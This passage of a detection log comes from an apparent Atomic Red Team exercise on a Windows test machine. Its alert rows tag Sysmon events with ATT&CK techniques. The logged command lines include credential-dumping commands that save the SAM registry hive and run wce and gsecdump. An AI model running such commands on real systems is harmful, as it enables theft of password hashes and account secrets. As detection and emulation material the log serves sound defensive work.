<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\sam sam&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.224751,2019-07-19T19:11:17.224751+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:17.149274Z"">
</TimeCreated>
<EventRecordID>4116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:17.139</Data>
<Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-0010D6914A00</Data>
<Data Name=""ProcessId"">6264</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wce -o output.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:17.107912Z"">
</TimeCreated>
<EventRecordID>4115</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:17.097</Data>
<Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-0010B38E4A00</Data>
<Data Name=""ProcessId"">5216</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wce -o output.txt&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wce -o output.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:17.107912Z"">
</TimeCreated>
<EventRecordID>4115</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:17.097</Data>
<Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-0010B38E4A00</Data>
<Data Name=""ProcessId"">5216</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wce -o output.txt&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.107912,2019-07-19T19:11:17.107912+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:17.027188Z"">
</TimeCreated>
<EventRecordID>4114</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:17.016</Data>
<Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-0010148A4A00</Data>
<Data Name=""ProcessId"">5476</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;gsecdump -a&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:16.986676Z"">
</TimeCreated>
<EventRecordID>4113</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:16.975</Data>
<Data Name=""ProcessGuid"">747F3D96-DD94-5D31-0000-0010F4864A00</Data>
<Data Name=""ProcessId"">3920</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;gsecdump -a&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;gsecdump -a&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:16.986676Z"">
</TimeCreated>
<EventRecordID>4113</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:16.975</Data>
<Data Name=""ProcessGuid"">747F3D96-DD94-5D31-0000-0010F4864A00</Data>
<Data Name=""ProcessId"">3920</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;gsecdump -a&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1563549076.48799,2019-07-19T19:11:16.487990+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:08.184716Z"">
</TimeCreated>
<EventRecordID>4111</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3400"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-19 15:11:03.652</Data>
<Data Name=""ProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ProcessId"">5840</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49744</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( &quot;C:\Windows\system32\whoami.exe&quot; /user) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:07.994501Z"">
</TimeCreated>
<EventRecordID>4110</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:07.987</Data>
<Data Name=""ProcessGuid"">747F3D96-DD8B-5D31-0000-001094584A00</Data>
<Data Name=""ProcessId"">5792</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /user</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; /user ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:07.994501Z"">
</TimeCreated>
<EventRecordID>4110</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:07.987</Data>
<Data Name=""ProcessGuid"">747F3D96-DD8B-5D31-0000-001094584A00</Data>
<Data Name=""ProcessId"">5792</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /user</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot;) in directory : ( c:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:09:59.931135Z"">
</TimeCreated>
<EventRecordID>4108</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:09:59.829</Data>
<Data Name=""ProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ProcessId"">5840</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell</Data>
<Data Name=""CurrentDirectory"">c:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD37-5D31-0000-00109D4C4900</Data>
<Data Name=""ParentProcessId"">5632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:09:59.931135Z"">
</TimeCreated>
<EventRecordID>4108</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:09:59.829</Data>
<Data Name=""ProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ProcessId"">5840</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell</Data>
<Data Name=""CurrentDirectory"">c:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
